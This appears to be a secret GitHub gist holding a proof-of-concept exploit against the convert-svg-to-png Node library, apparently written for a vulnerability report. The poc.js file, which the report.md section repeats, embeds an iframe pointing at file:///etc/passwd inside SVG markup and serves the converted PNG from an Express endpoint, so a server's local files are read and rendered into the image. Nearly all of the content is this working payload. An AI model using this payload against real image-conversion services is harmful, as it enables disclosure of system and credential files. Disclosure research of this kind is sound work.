legndery/payload.svg Secret

## payload.svg

      
Display the source blob

    
Display the rendered blob

    
    Raw
  

              payload.svg
            
          
      Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## poc.js
const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `<svg-dummy></svg-dummy>
<iframe src="file:///etc/passwd" width="100%" height="1000px"></iframe>
<svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="0" class="Rrrrr" id="demo">data</text>
</svg>`;
const app = express();
app.get('/poc', async (req, res)=>{
  try {
    const png = await convert(fileSvg);
    res.set('Content-Type', 'image/png');
    res.send(png);
  } catch (e) {
    res.send("")
  }
})
app.listen(3000, ()=>{
  console.log('started');
});

## poc_output.png

      
    Raw
  

              poc_output.png
            
          
## report.md

      
    Raw
  

              report.md
            
          
            View raw
              (Sorry about that, but we can’t show files that are this big right now.)
	const { convert } = require('convert-svg-to-png');
	const express = require('express');
	const fileSvg = `<svg-dummy></svg-dummy>
	<iframe src="file:///etc/passwd" width="100%" height="1000px"></iframe>
	<svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg">
	<text x="0" y="0" class="Rrrrr" id="demo">data</text>
	</svg>`;
	const app = express();
	app.get('/poc', async (req, res)=>{
	try {
	const png = await convert(fileSvg);
	res.set('Content-Type', 'image/png');
	res.send(png);
	} catch (e) {
	res.send("")
	}
	})
	app.listen(3000, ()=>{
	console.log('started');
	});